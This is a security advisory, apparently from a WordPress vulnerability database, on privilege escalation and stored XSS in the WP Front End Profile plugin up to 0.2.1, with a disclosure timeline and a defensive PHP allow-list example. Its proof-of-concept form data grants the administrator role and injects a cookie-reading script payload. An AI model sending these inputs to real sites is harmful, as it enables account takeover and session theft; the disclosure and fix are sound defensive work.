WP Front End Profile <= 0.2.1 - Privilege Escalation & Stored Cross-Site Scripting (XSS)

Description
It is possible to modify the POST request sent by the front-end profile update form so that it writes arbitrary user meta keys, including 'wp_capabilities' and 'wp_user_level'. Because these keys are not restricted to the fields the form is meant to edit, a low-privileged user can grant themselves the administrator role, which results in a privilege escalation vulnerability.

User input is neither sanitised when saved nor escaped when output, resulting in a stored XSS vulnerability.

Timeline:

2016-09-12: Vulnerability found
2016-09-12: Reported to vendor
2016-09-12: Vendor responded
2016-09-14: Vendor released a fixed version (0.2.2)
2016-09-14: Public disclosure

Proof of Concept
Privilege Escalation - Form data

profile[user_email]:subscriber@example.com
profile[wp_capabilities][administrator]:1
profile[wp_user_level]:10
profile[user_url]:
profile[description]:
profile[wpfep_save]:Update Profile
wpfep_nonce_name:99fc626e77
_wp_http_referer:/sample-page/

Stored XSS - Form data

wpmark_tab[testing_field]:example"><script>alert(document.cookie)</script>
wpmark_tab[wpfep_save]:Update Testing
wpfep_nonce_name:02c01469d8
_wp_http_referer:/sample-page/
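Both proof-of-concept requests succeed for the same reason: the handler takes whatever keys arrive in the profile array and stores them, and later prints the stored values without escaping. The following is an added example written for this entry; it is not the plugin's own code and not its 0.2.2 fix (see the changeset URL in References for that). It assumes the form posts a profile[...] array and a wpfep_nonce_name field as in the PoC above; the nonce action name and all function names prefixed example_ are hypothetical. The point it demonstrates is an allow-list of editable fields, each tied to a sanitiser, so that unexpected keys such as wp_capabilities are simply dropped, plus esc_attr() on the way back out so a stored value cannot break out of the attribute it is printed into.

```php
<?php
// Added example (not the plugin's code): allow-list handling of a
// front-end profile form. Hypothetical names: example_* functions and the
// nonce action 'example_profile_save'.

/**
 * The only fields a user may change about themselves, each with the
 * WordPress sanitiser applied before storage. Anything not listed here,
 * e.g. wp_capabilities or wp_user_level, never reaches the database.
 */
function example_profile_allowed_fields() {
    return array(
        'user_email'  => 'sanitize_email',
        'user_url'    => 'esc_url_raw',
        'description' => 'sanitize_text_field', // use wp_kses_post() if limited HTML is wanted
    );
}

/**
 * Reduce the submitted array to allow-listed, sanitised scalar values.
 * Keys that are not in the allow-list are discarded rather than stored.
 */
function example_filter_profile_input( array $submitted ) {
    $clean = array();
    foreach ( example_profile_allowed_fields() as $key => $sanitiser ) {
        if ( isset( $submitted[ $key ] ) && is_scalar( $submitted[ $key ] ) ) {
            $clean[ $key ] = call_user_func( $sanitiser, wp_unslash( $submitted[ $key ] ) );
        }
    }
    return $clean;
}

/**
 * Save handler: verify the nonce and that a user is logged in, then write
 * only the filtered fields, and only to the current user's own record.
 */
function example_handle_profile_save() {
    if ( ! isset( $_POST['profile']['wpfep_save'] ) ) {
        return;
    }
    if ( ! isset( $_POST['wpfep_nonce_name'] )
        || ! wp_verify_nonce( $_POST['wpfep_nonce_name'], 'example_profile_save' ) ) {
        wp_die( 'Invalid request.' );
    }
    if ( ! is_user_logged_in() ) {
        wp_die( 'Not allowed.' );
    }

    $user_id = get_current_user_id();
    $clean   = example_filter_profile_input( (array) $_POST['profile'] );

    // user_email and user_url are core user columns; description is user meta.
    $userdata = array( 'ID' => $user_id );
    foreach ( array( 'user_email', 'user_url' ) as $core_field ) {
        if ( isset( $clean[ $core_field ] ) ) {
            $userdata[ $core_field ] = $clean[ $core_field ];
        }
    }
    if ( count( $userdata ) > 1 ) {
        wp_update_user( $userdata );
    }
    if ( isset( $clean['description'] ) ) {
        update_user_meta( $user_id, 'description', $clean['description'] );
    }
}
add_action( 'init', 'example_handle_profile_save' );

/**
 * Render a stored value back into a form field. esc_attr() is what keeps a
 * stored value such as the "><script> payload from the XSS PoC inside the
 * value attribute instead of closing it.
 */
function example_render_text_field( $name, $value ) {
    return sprintf(
        '<input type="text" name="%s" value="%s" />',
        esc_attr( $name ),
        esc_attr( $value )
    );
}
```

With this shape the privilege escalation request above is harmless because profile[wp_capabilities] and profile[wp_user_level] are not in the allow-list and are dropped by example_filter_profile_input(), and the XSS request is stored as plain text and rendered through esc_attr(). When reviewing a plugin for the same class of bug, look for loops of the form foreach ( $_POST[...] as $key => $value ) update_user_meta( ..., $key, $value ) and for echo of user data without an esc_* call.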

Affects Plugin

Fixed in version 0.2.2

References

CVE 2019-15110
CVE 2019-15111
URL https://plugins.trac.wordpress.org/changeset/1495896/wp-front-end-profile

Classification

Type MULTI

Miscellaneous

Submitter Phil Wylie
Submitter Website https://www.philwylie.co.uk/
Submitter Twitter mustardbees
Views 4771
Verified No
WPVDB ID 8620

Timeline

Publicly Published 2016-09-14
Added 2016-09-15
Last Updated 2019-08-21
